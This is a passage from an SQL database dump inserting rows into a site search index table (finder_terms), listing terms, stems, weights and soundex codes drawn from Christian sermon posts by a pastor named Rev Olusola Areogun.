(36558, 'go and win', 'go and win', 0, 1, 1.3333, 'G535', 29, '*'),
(36559, 'god 2017', 'god 2017', 0, 1, 1.2667, 'G300', 2, '*'),
(36561, 'god has ordained', 'god has ordained', 0, 1, 1.5333, 'G326353', 2, '*'),
(36562, 'god\'s servant', 'god servant', 0, 1, 1.4333, 'G326153', 27, '*'),
(36563, 'god\'s servant rev', 'god servant rev', 0, 1, 1.5667, 'G32615361', 26, '*'),
(36564, 'great', 'great', 0, 0, 0.3333, 'G630', 17, '*'),
(36584, 'happen', 'happen', 0, 0, 0.4, 'H150', 7, '*'),
(36592, 'has a', 'ha a', 0, 1, 1.1667, 'H200', 5, '*'),
(36594, 'has ordained', 'ha ordained', 0, 1, 1.4, 'H26353', 2, '*'),
(36596, 'he has', 'he has', 0, 1, 1.2, 'H200', 8, '*'),
(36603, 'heart a', 'heart a', 0, 1, 1.2333, 'H630', 2, '*'),
(36605, 'heaven', 'heaven', 0, 0, 0.4, 'H150', 12, '*'),
(36606, 'heaven is', 'heaven is', 0, 1, 1.3, 'H152', 3, '*'),
(36608, 'held', 'held', 0, 0, 0.2667, 'H430', 2, '*'),
(36611, 'her', 'her', 0, 0, 0.2, 'H600', 8, '*'),
(36629, 'hold', 'hold', 0, 0, 0.2667, 'H430', 3, '*'),
(36632, 'however', 'howev', 0, 0, 0.4667, 'H160', 11, '*'),
(36635, 'hundred', 'hundr', 0, 0, 0.4667, 'H5363', 2, '*'),
(36641, 'in his', 'in his', 0, 1, 1.2, 'I520', 11, '*'),
(36646, 'in the land', 'in the land', 0, 1, 1.3667, 'I53453', 3, '*'),
(36647, 'in the midst', 'in the midst', 0, 1, 1.4, 'I535323', 2, '*'),
(36648, 'in their', 'in their', 0, 1, 1.2667, 'I536', 5, '*'),
(36650, 'in to', 'in to', 0, 1, 1.1667, 'I530', 3, '*'),
(36655, 'instructed', 'instruct', 0, 0, 0.6667, 'I523623', 3, '*'),
(36671, 'is ready', 'is ready', 0, 1, 1.2667, 'I263', 3, '*'),
(36672, 'is ready to', 'is ready to', 0, 1, 1.3667, 'I263', 2, '*'),
(36674, 'isaac', 'isaac', 0, 0, 0.3333, 'I200', 4, '*'),
(36677, 'israel', 'israel', 0, 0, 0.4, 'I264', 8, '*'),
(36681, 'it means', 'it means', 0, 1, 1.2667, 'I352', 6, '*'),
(36682, 'it means to', 'it means to', 0, 1, 1.3667, 'I3523', 2, '*'),
(36687, 'jesus christ', 'jesu christ', 0, 1, 1.4, 'J623', 8, '*'),
(36689, 'jesus god\'s', 'jesu god', 0, 1, 1.3667, 'J320', 25, '*'),
(36690, 'jesus god\'s servant', 'jesu god servant', 0, 1, 1.6333, 'J326153', 25, '*'),
(36700, 'keep being', 'keep being', 0, 1, 1.3333, 'K152', 3, '*'),
(36708, 'king', 'king', 0, 0, 0.2667, 'K520', 6, '*'),
(36716, 'land', 'land', 0, 0, 0.2667, 'L530', 8, '*'),
(36721, 'leaving', 'leav', 0, 0, 0.4667, 'L152', 3, '*'),
(36722, 'leaving your', 'leav your', 0, 1, 1.4, 'L1526', 2, '*'),
(36724, 'left', 'left', 0, 0, 0.2667, 'L130', 4, '*'),
(36735, 'like a', 'like a', 0, 1, 1.2, 'L200', 6, '*'),
(36756, 'man who', 'man who', 0, 1, 1.2333, 'M000', 2, '*'),
(36760, 'mark', 'mark', 0, 0, 0.2667, 'M620', 8, '*'),
(36763, 'matter the', 'matter the', 0, 1, 1.3333, 'M363', 5, '*'),
(36765, 'mean', 'mean', 0, 0, 0.2667, 'M000', 4, '*'),
(36768, 'means', 'mean', 0, 0, 0.3333, 'M200', 14, '*'),
(36769, 'means to', 'mean to', 0, 1, 1.2667, 'M230', 5, '*'),
(36775, 'midst', 'midst', 0, 0, 0.3333, 'M323', 2, '*'),
(36776, 'midst of', 'midst of', 0, 1, 1.2667, 'M3231', 2, '*'),
(36778, 'mighty', 'mighti', 0, 0, 0.4, 'M230', 2, '*'),
(36785, 'move into', 'move into', 0, 1, 1.3, 'M153', 2, '*'),
(36797, 'next', 'next', 0, 0, 0.2667, 'N230', 35, '*'),
(36800, 'no matter', 'no matter', 0, 1, 1.3, 'N360', 8, '*'),
(36801, 'no matter the', 'no matter the', 0, 1, 1.4333, 'N363', 3, '*'),
(36808, 'of heart', 'of heart', 0, 1, 1.2667, 'O163', 3, '*'),
(36829, 'olusola areogun', 'olusola areogun', 0, 1, 1.5, 'O424625', 23, '*'),
(36832, 'or challenges', 'or challenges', 0, 1, 1.4333, 'O62452', 2, '*'),
(36834, 'or even', 'or even', 0, 1, 1.2333, 'O615', 2, '*'),
(36837, 'ordained', 'ordain', 0, 0, 0.5333, 'O6353', 6, '*'),
(36838, 'ordained you', 'ordain you', 0, 1, 1.4, 'O6353', 2, '*'),
(36840, 'others', 'other', 0, 0, 0.4, 'O362', 10, '*'),
(36843, 'out of', 'out of', 0, 1, 1.2, 'O310', 19, '*'),
(36844, 'out of his', 'out of his', 0, 1, 1.3333, 'O312', 2, '*'),
(36846, 'out of your', 'out of your', 0, 1, 1.3667, 'O316', 4, '*'),
(36853, 'pastor', 'pastor', 0, 0, 0.4, 'P236', 8, '*'),
(36905, 'places', 'place', 0, 0, 0.4, 'P420', 2, '*'),
(36910, 'popular', 'popular', 0, 0, 0.4667, 'P460', 2, '*'),
(36913, 'position', 'posit', 0, 0, 0.5333, 'P235', 5, '*'),
(36925, 'prosper', 'prosper', 0, 0, 0.4667, 'P6216', 2, '*'),
(36935, 'ready', 'readi', 0, 0, 0.3333, 'R300', 13, '*'),
(36936, 'ready to', 'readi to', 0, 1, 1.2667, 'R300', 5, '*'),
(36938, 'remain', 'remain', 0, 0, 0.4, 'R500', 6, '*'),
(36939, 'remain there', 'remain there', 0, 1, 1.4, 'R536', 3, '*'),
(36941, 'replacement', 'replac', 0, 0, 0.7333, 'R14253', 2, '*'),
(36944, 'rev olusola areogun', 'rev olusola areogun', 0, 1, 1.6333, 'R1424625', 23, '*'),
(36945, 'role', 'role', 0, 0, 0.2667, 'R400', 3, '*'),
(36948, 'said in', 'said in', 0, 1, 1.2333, 'S350', 4, '*'),
(36950, 'samuel', 'samuel', 0, 0, 0.4, 'S540', 8, '*'),
(36953, 'saul', 'saul', 0, 0, 0.2667, 'S400', 5, '*'),
(36956, 'says in', 'sai in', 0, 1, 1.2333, 'S500', 3, '*'),
(36958, 'scripture', 'scriptur', 0, 0, 0.6, 'S6136', 9, '*'),
(36961, 'see', 'see', 0, 0, 0.2, 'S000', 20, '*'),
(36966, 'servant rev', 'servant rev', 0, 1, 1.3667, 'S615361', 26, '*'),
(36967, 'servant rev olusola', 'servant rev olusola', 0, 1, 1.6333, 'S615361424', 23, '*'),
(36974, 'so is', 'so is', 0, 1, 1.1667, 'S000', 3, '*'),
(36992, 'state of', 'state of', 0, 1, 1.2667, 'S310', 2, '*'),
(36994, 'stay in', 'stai in', 0, 1, 1.2333, 'S350', 3, '*'),
(37002, 'stood', 'stood', 0, 0, 0.3333, 'S300', 3, '*'),
(37007, 'strong', 'strong', 0, 0, 0.4, 'S3652', 9, '*'),
(37008, 'strong and', 'strong and', 0, 1, 1.3333, 'S365253', 2, '*'),
(37018, 'talks', 'talk', 0, 0, 0.3333, 'T420', 4, '*'),
(37019, 'talks of', 'talk of', 0, 1, 1.2667, 'T421', 3, '*'),
(37023, 'the best', 'the best', 0, 1, 1.2667, 'T123', 5, '*'),
(37027, 'the enemy', 'the enemy', 0, 1, 1.3, 'T500', 9, '*'),
(37033, 'the land', 'the land', 0, 1, 1.2667, 'T453', 4, '*'),
(37037, 'the midst', 'the midst', 0, 1, 1.3, 'T5323', 2, '*'),
(37038, 'the midst of', 'the midst of', 0, 1, 1.4, 'T53231', 2, '*'),
(37039, 'the new', 'the new', 0, 1, 1.2333, 'T500', 3, '*'),
(37048, 'the scripture', 'the scripture', 0, 1, 1.4333, 'T26136', 4, '*'),
(37054, 'their place', 'their place', 0, 1, 1.3667, 'T6142', 2, '*'),
(37059, 'there no', 'there no', 0, 1, 1.2667, 'T650', 3, '*'),
(37063, 'there will', 'there will', 0, 1, 1.3333, 'T640', 6, '*'),
(37064, 'there will be', 'there will be', 0, 1, 1.4333, 'T641', 5, '*'),
(37067, 'things happen', 'thing happen', 0, 1, 1.4333, 'T5215', 2, '*'),
(37069, 'till', 'till', 0, 0, 0.2667, 'T400', 33, '*'),
(37070, 'till next', 'till next', 0, 1, 1.3, 'T4523', 31, '*'),
(37082, 'to stay', 'to stay', 0, 1, 1.2333, 'T230', 3, '*'),
(37084, 'to the enemy', 'to the enemy', 0, 1, 1.4, 'T500', 4, '*'),
(37096, 'try to', 'try to', 0, 1, 1.2, 'T630', 6, '*'),
(37111, 'verse', 'vers', 0, 0, 0.3333, 'V620', 6, '*'),
(37112, 'verse 12', 'vers 12', 0, 1, 1.2667, 'V620', 2, '*'),
(37120, 'we move', 'we move', 0, 1, 1.2333, 'W510', 2, '*'),
(37125, 'where', 'where', 0, 0, 0.3333, 'W600', 20, '*'),
(37134, 'who will', 'who will', 0, 1, 1.2667, 'W400', 4, '*'),
(37136, 'wife', 'wife', 0, 0, 0.2667, 'W100', 4, '*'),
(37140, 'will take', 'will take', 0, 1, 1.3, 'W432', 5, '*'),
(37142, 'win', 'win', 0, 0, 0.2, 'W500', 32, '*'),
(37143, 'win with', 'win with', 0, 1, 1.2667, 'W530', 29, '*'),
(37144, 'win with jesus', 'win with jesus', 0, 1, 1.4667, 'W532', 29, '*'),
(37145, 'with his', 'with his', 0, 1, 1.2667, 'W320', 6, '*'),
(37147, 'with jesus', 'with jesus', 0, 1, 1.3333, 'W320', 29, '*'),
(37148, 'with jesus god\'s', 'with jesus god', 0, 1, 1.5333, 'W3232', 25, '*'),
(37173, 'you out', 'you out', 0, 1, 1.2333, 'Y300', 3, '*'),
(45520, '13', '13', 0, 0, 0.2, '', 14, '*'),
(45797, 'deep', 'deep', 0, 0, 0.2667, 'D100', 4, '*'),
(45803, 'despite', 'despit', 0, 0, 0.4667, 'D213', 3, '*'),
(45804, 'despite the', 'despit the', 0, 1, 1.3667, 'D213', 2, '*'),
(45851, 'end', 'end', 0, 0, 0.2, 'E530', 11, '*'),
(46033, 'in these', 'in these', 0, 1, 1.2667, 'I532', 6, '*'),
(46034, 'in these last', 'in these last', 0, 1, 1.4333, 'I532423', 4, '*'),
(46118, 'last days', 'last days', 0, 1, 1.3, 'L232', 4, '*'),
(46281, 'paul', 'paul', 0, 0, 0.2667, 'P400', 6, '*'),
(46303, 'possess', 'possess', 0, 0, 0.4667, 'P200', 2, '*'),
(46384, 'spirit of', 'spirit of', 0, 1, 1.3, 'S1631', 4, '*'),
(46413, 'status', 'statu', 0, 0, 0.4, 'S320', 3, '*'),
(46426, 'take place', 'take place', 0, 1, 1.3333, 'T2142', 2, '*'),
(46440, 'that can', 'that can', 0, 1, 1.2667, 'T250', 5, '*'),
(46449, 'that it', 'that it', 0, 1, 1.2333, 'T000', 7, '*'),
(46508, 'the spirit of', 'the spirit of', 0, 1, 1.4333, 'T21631', 3, '*'),
(46531, 'these last', 'these last', 0, 1, 1.3333, 'T2423', 4, '*'),
(46532, 'these last days', 'these last days', 0, 1, 1.5, 'T24232', 4, '*'),
(50643, '1 john', '1 john', 0, 1, 1.2, 'J500', 2, '*'),
(50649, '14 the', '14 the', 0, 1, 1.2, 'T000', 2, '*'),
(50651, '17-18', '17-18', 0, 0, 0.5, '', 3, '*'),
(50662, '3 5', '3 5', 0, 1, 1.1, '', 2, '*'),
(50669, '43', '43', 0, 0, 0.2, '', 3, '*'),
(50676, '7-9', '7-9', 0, 0, 0.3, '', 2, '*'),
(50684, 'a christian', 'a christian', 0, 1, 1.3667, 'A26235', 11, '*'),
(50685, 'a christian and', 'a christian and', 0, 1, 1.5, 'A262353', 3, '*'),
(50687, 'a glorious', 'a glorious', 0, 1, 1.3333, 'A2462', 2, '*'),
(50697, 'abandoned', 'abandon', 0, 0, 0.6, 'A15353', 2, '*'),
(50702, 'acceptable', 'accept', 0, 0, 0.6667, 'A21314', 2, '*'),
(50720, 'an unbeliever', 'an unbeliever', 0, 1, 1.4333, 'A51416', 2, '*'),
(50726, 'and everyone', 'and everyone', 0, 1, 1.4, 'A53165', 2, '*'),
(50733, 'and live', 'and live', 0, 1, 1.2667, 'A5341', 4, '*'),
(50739, 'and without', 'and without', 0, 1, 1.3667, 'A530', 2, '*'),
(50750, 'as he', 'as he', 0, 1, 1.1667, 'A200', 4, '*'),
(50770, 'because there', 'becaus there', 0, 1, 1.4333, 'B236', 3, '*'),
(50772, 'believers', 'believ', 0, 0, 0.6, 'B4162', 9, '*'),
(50790, 'by the', 'by the', 0, 1, 1.2, 'B300', 7, '*'),
(50813, 'christ will', 'christ will', 0, 1, 1.3667, 'C6234', 2, '*'),
(50815, 'christ\'s', 'christ', 0, 0, 0.5333, 'C6232', 2, '*'),
(50818, 'christian', 'christian', 0, 0, 0.6, 'C6235', 14, '*'),
(50819, 'christian and', 'christian and', 0, 1, 1.4333, 'C62353', 4, '*'),
(50826, 'church to', 'church to', 0, 1, 1.3, 'C623', 2, '*'),
(50830, 'cleanse', 'cleans', 0, 0, 0.4667, 'C452', 2, '*'),
(50836, 'come for', 'come for', 0, 1, 1.2667, 'C516', 2, '*'),
(50853, 'coming of', 'come of', 0, 1, 1.3, 'C521', 2, '*'),
(50871, 'cor 1', 'cor 1', 0, 1, 1.1667, 'C600', 2, '*'),
(50873, 'day', 'dai', 0, 0, 0.2, 'D000', 13, '*'),
(50882, 'delivered', 'deliv', 0, 0, 0.6, 'D4163', 3, '*'),
(50885, 'demanded', 'demand', 0, 0, 0.5333, 'D530', 5, '*'),
(50886, 'demanded of', 'demand of', 0, 1, 1.3667, 'D531', 3, '*'),
(50888, 'determine the', 'determin the', 0, 1, 1.4333, 'D653', 2, '*'),
(50907, 'ephesians', 'ephesian', 0, 0, 0.6, 'E1252', 3, '*'),
(50912, 'even jesus', 'even jesus', 0, 1, 1.3333, 'E152', 2, '*'),
(50914, 'every member', 'everi member', 0, 1, 1.4, 'E16516', 2, '*'),
(50916, 'everyday', 'everydai', 0, 0, 0.5333, 'E163', 3, '*'),
(50919, 'everyone that', 'everyon that', 0, 1, 1.4333, 'E1653', 4, '*'),
(50929, 'eyes', 'ey', 0, 0, 0.2667, 'E200', 4, '*'),
(50949, 'for us', 'for us', 0, 1, 1.2, 'F620', 11, '*'),
(50953, 'from heaven', 'from heaven', 0, 1, 1.3667, 'F6515', 2, '*'),
(50957, 'future and', 'futur and', 0, 1, 1.3333, 'F3653', 3, '*'),
(50959, 'future in', 'futur in', 0, 1, 1.3, 'F365', 4, '*'),
(50969, 'god has not', 'god has not', 0, 1, 1.3667, 'G3253', 2, '*'),
(50973, 'has not', 'ha not', 0, 1, 1.2333, 'H253', 4, '*'),
(50992, 'he\'s not', 'he not', 0, 1, 1.2667, 'H253', 2, '*'),
(51016, 'his son', 'hi son', 0, 1, 1.2333, 'H250', 2, '*'),
(51018, 'holiness', 'holi', 0, 0, 0.5333, 'H452', 2, '*'),
(51026, 'hope', 'hope', 0, 0, 0.2667, 'H100', 2, '*'),
(51059, 'how do', 'how do', 0, 1, 1.2, 'H300', 4, '*'),
(51060, 'how do you', 'how do you', 0, 1, 1.3333, 'H300', 4, '*'),
(51064, 'if he is', 'if he is', 0, 1, 1.2667, 'I120', 3, '*'),
(51068, 'if you are', 'if you are', 0, 1, 1.3333, 'I160', 6, '*'),
(51070, 'in glory', 'in glory', 0, 1, 1.2667, 'I5246', 2, '*'),
(51072, 'in our', 'in our', 0, 1, 1.2, 'I560', 4, '*'),
(51076, 'in physical', 'in physical', 0, 1, 1.3667, 'I5124', 2, '*'),
(51083, 'in the old', 'in the old', 0, 1, 1.3333, 'I5343', 3, '*'),
(51098, 'is coming', 'is coming', 0, 1, 1.3, 'I252', 4, '*'),
(51104, 'is hope', 'is hope', 0, 1, 1.2333, 'I210', 2, '*'),
(51108, 'is in', 'is in', 0, 1, 1.1667, 'I250', 12, '*'),
(51109, 'is in the', 'is in the', 0, 1, 1.3, 'I253', 4, '*'),
(51112, 'is not coming', 'is not coming', 0, 1, 1.4333, 'I253252', 2, '*'),
(51121, 'is still', 'is still', 0, 1, 1.2667, 'I234', 2, '*'),
(51123, 'is why', 'is why', 0, 1, 1.2, 'I200', 3, '*'),
(51129, 'it to', 'it to', 0, 1, 1.1667, 'I300', 4, '*'),
(51142, 'john 3', 'john 3', 0, 1, 1.2, 'J500', 2, '*'),
(51148, 'later', 'later', 0, 0, 0.3333, 'L360', 3, '*'),
(51165, 'living in', 'live in', 0, 1, 1.3, 'L1525', 2, '*'),
(51171, 'lord he', 'lord he', 0, 1, 1.2333, 'L630', 2, '*'),
(51173, 'lord will', 'lord will', 0, 1, 1.3, 'L634', 2, '*'),
(51175, 'love', 'love', 0, 0, 0.2667, 'L100', 8, '*'),
(51178, 'luke', 'luke', 0, 0, 0.2667, 'L200', 7, '*'),
(51185, 'makes you', 'make you', 0, 1, 1.3, 'M200', 8, '*'),
(51188, 'member', 'member', 0, 0, 0.4, 'M160', 3, '*'),
(51207, 'must learn', 'must learn', 0, 1, 1.3333, 'M23465', 2, '*'),
(51219, 'not coming', 'not coming', 0, 1, 1.3333, 'N3252', 2, '*'),
(51221, 'not having', 'not having', 0, 1, 1.3333, 'N3152', 2, '*'),
(51229, 'of christ', 'of christ', 0, 1, 1.3, 'O12623', 3, '*'),
(51239, 'of jesus christ', 'of jesus christ', 0, 1, 1.5, 'O12623', 3, '*'),
(51241, 'of righteousness', 'of righteousness', 0, 1, 1.5333, 'O1623252', 2, '*'),
(51243, 'of the church', 'of the church', 0, 1, 1.4333, 'O13262', 3, '*'),
(51248, 'of water', 'of water', 0, 1, 1.2667, 'O136', 2, '*'),
(51250, 'old testament', 'old testament', 0, 1, 1.4333, 'O432353', 3, '*'),
(51252, 'on him', 'on him', 0, 1, 1.2, 'O500', 2, '*'),
(51254, 'one day', 'on day', 0, 1, 1.2333, 'O530', 4, '*'),
(51265, 'or not', 'or not', 0, 1, 1.2, 'O653', 5, '*'),
(51286, 'physical', 'physic', 0, 0, 0.5333, 'P240', 5, '*'),
(51293, 'pure', 'pure', 0, 0, 0.2667, 'P600', 3, '*'),
(51314, 'relate', 'relat', 0, 0, 0.4, 'R430', 2, '*'),
(51315, 'relate with', 'relat with', 0, 1, 1.3667, 'R430', 2, '*'),
(51320, 'return', 'return', 0, 0, 0.4, 'R365', 5, '*'),
(51330, 'saints', 'saint', 0, 0, 0.4, 'S532', 2, '*'),
(51336, 'second', 'second', 0, 0, 0.4, 'S530', 3, '*'),
(51337, 'second coming', 'second coming', 0, 1, 1.4333, 'S53252', 2, '*'),
(51339, 'second coming of', 'second coming of', 0, 1, 1.5333, 'S532521', 2, '*'),
(51342, 'shadow', 'shadow', 0, 0, 0.4, 'S300', 1, '*'),
(51343, 'shadow of', 'shadow of', 0, 1, 1.3, 'S310', 1, '*'),
(51344, 'shadow of the', 'shadow of the', 0, 1, 1.4333, 'S313', 1, '*'),
(51347, 'shall see', 'shall see', 0, 1, 1.3, 'S420', 2, '*'),
(51353, 'somebody', 'somebodi', 0, 0, 0.5333, 'S513', 4, '*'),
(51359, 'someone', 'someon', 0, 0, 0.4667, 'S500', 5, '*'),
(51374, 'standard', 'standard', 0, 0, 0.5333, 'S35363', 4, '*'),
(51382, 'statement', 'statement', 0, 0, 0.6, 'S353', 2, '*'),
(51387, 'still', 'still', 0, 0, 0.3333, 'S340', 8, '*'),
(51390, 'such a', 'such a', 0, 1, 1.2, 'S000', 7, '*'),
(51396, 'tell', 'tell', 0, 0, 0.2667, 'T400', 10, '*'),
(51399, 'testament', 'testament', 0, 0, 0.6, 'T2353', 4, '*'),
(51402, 'testimony', 'testimoni', 0, 0, 0.6, 'T235', 2, '*'),
(51415, 'that paul', 'that paul', 0, 1, 1.3, 'T140', 2, '*'),
(51417, 'that when', 'that when', 0, 1, 1.3, 'T500', 7, '*'),
(51418, 'that when the', 'that when the', 0, 1, 1.4333, 'T530', 2, '*'),
(51420, 'that you must', 'that you must', 0, 1, 1.4333, 'T523', 5, '*'),
(51425, 'the church', 'the church', 0, 1, 1.3333, 'T262', 6, '*'),
(51437, 'the eyes', 'the eyes', 0, 1, 1.2667, 'T200', 2, '*'),
(51446, 'the lord he', 'the lord he', 0, 1, 1.3667, 'T463', 2, '*'),
(51449, 'the major', 'the major', 0, 1, 1.3, 'T526', 2, '*'),
(51454, 'the old', 'the old', 0, 1, 1.2333, 'T430', 4, '*'),
(51455, 'the old testament', 'the old testament', 0, 1, 1.5667, 'T432353', 3, '*'),
(51460, 'the second', 'the second', 0, 1, 1.3333, 'T253', 2, '*'),
(51461, 'the second coming', 'the second coming', 0, 1, 1.5667, 'T253252', 2, '*'),
(51481, 'thessalonians', 'thessalonian', 0, 0, 0.8667, 'T2452', 2, '*'),
(51496, 'those', 'those', 0, 0, 0.3333, 'T200', 21, '*'),
(51500, 'to be in', 'to be in', 0, 1, 1.2667, 'T150', 2, '*'),
(51505, 'to know', 'to know', 0, 1, 1.2333, 'T250', 9, '*'),
(51506, 'to know that', 'to know that', 0, 1, 1.4, 'T253', 4, '*'),
(51510, 'touch', 'touch', 0, 0, 0.3333, 'T200', 3, '*'),
(51513, 'tribulation', 'tribul', 0, 0, 0.7333, 'T61435', 2, '*'),
(51526, 'us from', 'us from', 0, 1, 1.2333, 'U2165', 2, '*'),
(51527, 'us from the', 'us from the', 0, 1, 1.3667, 'U21653', 2, '*'),
(51545, 'water', 'water', 0, 0, 0.3333, 'W360', 6, '*'),
(51556, 'who has', 'who has', 0, 1, 1.2333, 'W200', 4, '*'),
(51560, 'why', 'why', 0, 0, 0.2, 'W000', 16, '*'),
(51567, 'will come', 'will come', 0, 1, 1.3, 'W425', 6, '*'),
(51568, 'will come for', 'will come for', 0, 1, 1.4333, 'W42516', 2, '*'),
(51569, 'will determine', 'will determine', 0, 1, 1.4667, 'W4365', 7, '*'),
(51580, 'word that', 'word that', 0, 1, 1.3, 'W630', 2, '*'),
(51582, 'worth', 'worth', 0, 0, 0.3333, 'W630', 3, '*'),
(51597, 'you to be', 'you to be', 0, 1, 1.3, 'Y310', 5, '*'),
(51605, '“and', '“and', 0, 0, 0.2667, '“530', 3, '*'),
(51610, '“there', '“there', 0, 0, 0.4, '“360', 2, '*'),
(63938, '1-2', '1-2', 0, 0, 0.3, '', 7, '*'),
(63952, '26', '26', 0, 0, 0.2, '', 15, '*'),
(63957, '28', '28', 0, 0, 0.2, '', 10, '*'),
(63964, '30', '30', 0, 0, 0.2, '', 10, '*'),
(63967, '31', '31', 0, 0, 0.2, '', 4, '*'),
(63993, 'a business', 'a business', 0, 1, 1.3333, 'A1252', 3, '*'),
(63996, 'a certain', 'a certain', 0, 1, 1.3, 'A2635', 2, '*'),
(64031, 'a word', 'a word', 0, 1, 1.2, 'A630', 2, '*'),
(64033, 'about the', 'about the', 0, 1, 1.3, 'A130', 3, '*'),
(64046, 'afford', 'afford', 0, 0, 0.4, 'A163', 5, '*'),
(64047, 'afford to', 'afford to', 0, 1, 1.3, 'A163', 5, '*'),
(64058, 'along', 'along', 0, 0, 0.3333, 'A452', 4, '*'),
(64090, 'and don\'t', 'and don', 0, 1, 1.3, 'A5353', 2, '*'),
(64101, 'and let', 'and let', 0, 1, 1.2333, 'A5343', 8, '*'),
(64103, 'and let the', 'and let the', 0, 1, 1.3667, 'A5343', 3, '*'),
(64104, 'and not', 'and not', 0, 1, 1.2333, 'A5353', 11, '*'),
(64107, 'and of', 'and of', 0, 1, 1.2, 'A531', 2, '*'),
(64115, 'and say', 'and say', 0, 1, 1.2333, 'A532', 2, '*'),
(64119, 'and take', 'and take', 0, 1, 1.2667, 'A532', 5, '*'),
(64121, 'and the anointing', 'and the anointing', 0, 1, 1.5667, 'A535352', 2, '*'),
(64162, 'at this', 'at this', 0, 1, 1.2333, 'A320', 2, '*'),
(64164, 'attack', 'attack', 0, 0, 0.4, 'A320', 3, '*'),
(64167, 'attacks', 'attack', 0, 0, 0.4667, 'A320', 4, '*'),
(64170, 'available', 'avail', 0, 0, 0.6, 'A1414', 5, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(64174, 'b', 'b', 0, 0, 0.0667, 'B000', 2, '*'),
(64180, 'be an', 'be an', 0, 1, 1.1667, 'B500', 4, '*'),
(64182, 'be at', 'be at', 0, 1, 1.1667, 'B300', 4, '*'),
(64184, 'be blessed', 'be blessed', 0, 1, 1.3333, 'B423', 3, '*'),
(64186, 'be careless', 'be careless', 0, 1, 1.3667, 'B2642', 4, '*'),
(64196, 'be sure', 'be sure', 0, 1, 1.2333, 'B260', 3, '*'),
(64207, 'because it', 'becaus it', 0, 1, 1.3333, 'B230', 4, '*'),
(64208, 'because it is', 'becaus it is', 0, 1, 1.4333, 'B232', 3, '*'),
(64214, 'before you', 'befor you', 0, 1, 1.3333, 'B600', 4, '*'),
(64222, 'birth', 'birth', 0, 0, 0.3333, 'B630', 8, '*'),
(64225, 'blessed', 'bless', 0, 0, 0.4667, 'B423', 6, '*'),
(64226, 'blessed of', 'bless of', 0, 1, 1.3333, 'B4231', 2, '*'),
(64228, 'blessing', 'bless', 0, 0, 0.5333, 'B4252', 4, '*'),
(64265, 'business in', 'busi in', 0, 1, 1.3667, 'B2525', 2, '*'),
(64295, 'but may', 'but may', 0, 1, 1.2333, 'B350', 2, '*'),
(64308, 'c', 'c', 0, 0, 0.0667, 'C000', 3, '*'),
(64320, 'can make', 'can make', 0, 1, 1.2667, 'C520', 6, '*'),
(64324, 'cannot afford', 'cannot afford', 0, 1, 1.4333, 'C53163', 4, '*'),
(64325, 'cannot afford to', 'cannot afford to', 0, 1, 1.5333, 'C53163', 4, '*'),
(64326, 'careless', 'careless', 0, 0, 0.5333, 'C642', 5, '*'),
(64329, 'certain', 'certain', 0, 0, 0.4667, 'C635', 5, '*'),
(64330, 'cheat', 'cheat', 0, 0, 0.3333, 'C300', 2, '*'),
(64336, 'command', 'command', 0, 0, 0.4667, 'C530', 2, '*'),
(64362, 'consider', 'consid', 0, 0, 0.5333, 'C5236', 3, '*'),
(64373, 'covenant', 'coven', 0, 0, 0.5333, 'C153', 4, '*'),
(64406, 'direction', 'direct', 0, 0, 0.6, 'D6235', 5, '*'),
(64428, 'do it well', 'do it well', 0, 1, 1.3333, 'D400', 2, '*'),
(64439, 'doing you', 'do you', 0, 1, 1.3, 'D520', 3, '*'),
(64441, 'don\'t be', 'don be', 0, 1, 1.2667, 'D531', 3, '*'),
(64447, 'don\'t just', 'don just', 0, 1, 1.3333, 'D5323', 5, '*'),
(64454, 'draw', 'draw', 0, 0, 0.2667, 'D600', 5, '*'),
(64483, 'engage', 'engag', 0, 0, 0.4, 'E520', 2, '*'),
(64484, 'engage in', 'engag in', 0, 1, 1.3, 'E525', 2, '*'),
(64488, 'enjoy', 'enjoi', 0, 0, 0.3333, 'E520', 4, '*'),
(64506, 'error and', 'error and', 0, 1, 1.3, 'E653', 2, '*'),
(64520, 'everybody', 'everybodi', 0, 0, 0.6, 'E1613', 3, '*'),
(64556, 'find out', 'find out', 0, 1, 1.2667, 'F530', 2, '*'),
(64557, 'find out what', 'find out what', 0, 1, 1.4333, 'F530', 2, '*'),
(64571, 'flow', 'flow', 0, 0, 0.2667, 'F400', 6, '*'),
(64577, 'follow', 'follow', 0, 0, 0.4, 'F400', 7, '*'),
(64598, 'force', 'forc', 0, 0, 0.3333, 'F620', 4, '*'),
(64604, 'forth', 'forth', 0, 0, 0.3333, 'F630', 8, '*'),
(64611, 'from god', 'from god', 0, 1, 1.2667, 'F6523', 7, '*'),
(64612, 'from god as', 'from god as', 0, 1, 1.3667, 'F65232', 2, '*'),
(64616, 'from that', 'from that', 0, 1, 1.3, 'F653', 3, '*'),
(64619, 'from your', 'from your', 0, 1, 1.3, 'F656', 6, '*'),
(64627, 'fulfill', 'fulfil', 0, 0, 0.4667, 'F414', 7, '*'),
(64630, 'function', 'function', 0, 0, 0.5333, 'F5235', 4, '*'),
(64633, 'further', 'further', 0, 0, 0.4667, 'F636', 2, '*'),
(64642, 'future that', 'futur that', 0, 1, 1.3667, 'F363', 3, '*'),
(64643, 'future that god', 'futur that god', 0, 1, 1.5, 'F36323', 3, '*'),
(64646, 'get involved', 'get involved', 0, 1, 1.4, 'G351413', 2, '*'),
(64647, 'get involved in', 'get involved in', 0, 1, 1.5, 'G3514135', 2, '*'),
(64652, 'give you a', 'give you a', 0, 1, 1.3333, 'G100', 2, '*'),
(64653, 'gives', 'give', 0, 0, 0.3333, 'G120', 12, '*'),
(64654, 'gives you', 'give you', 0, 1, 1.3, 'G120', 3, '*'),
(64664, 'god as', 'god as', 0, 1, 1.2, 'G320', 4, '*'),
(64672, 'god for', 'god for', 0, 1, 1.2333, 'G316', 6, '*'),
(64676, 'god gives', 'god gives', 0, 1, 1.3, 'G3212', 4, '*'),
(64677, 'god gives you', 'god gives you', 0, 1, 1.4333, 'G3212', 2, '*'),
(64682, 'god that', 'god that', 0, 1, 1.2667, 'G300', 8, '*'),
(64691, 'god you', 'god you', 0, 1, 1.2333, 'G300', 8, '*'),
(64697, 'god\'s kingdom', 'god kingdom', 0, 1, 1.4333, 'G325235', 2, '*'),
(64736, 'help', 'help', 0, 0, 0.2667, 'H410', 16, '*'),
(64737, 'help you', 'help you', 0, 1, 1.2667, 'H410', 10, '*'),
(64749, 'house of', 'hous of', 0, 1, 1.2667, 'H210', 4, '*'),
(64754, 'how you', 'how you', 0, 1, 1.2333, 'H000', 3, '*'),
(64790, 'in jesus name', 'in jesus name', 0, 1, 1.4333, 'I525', 7, '*'),
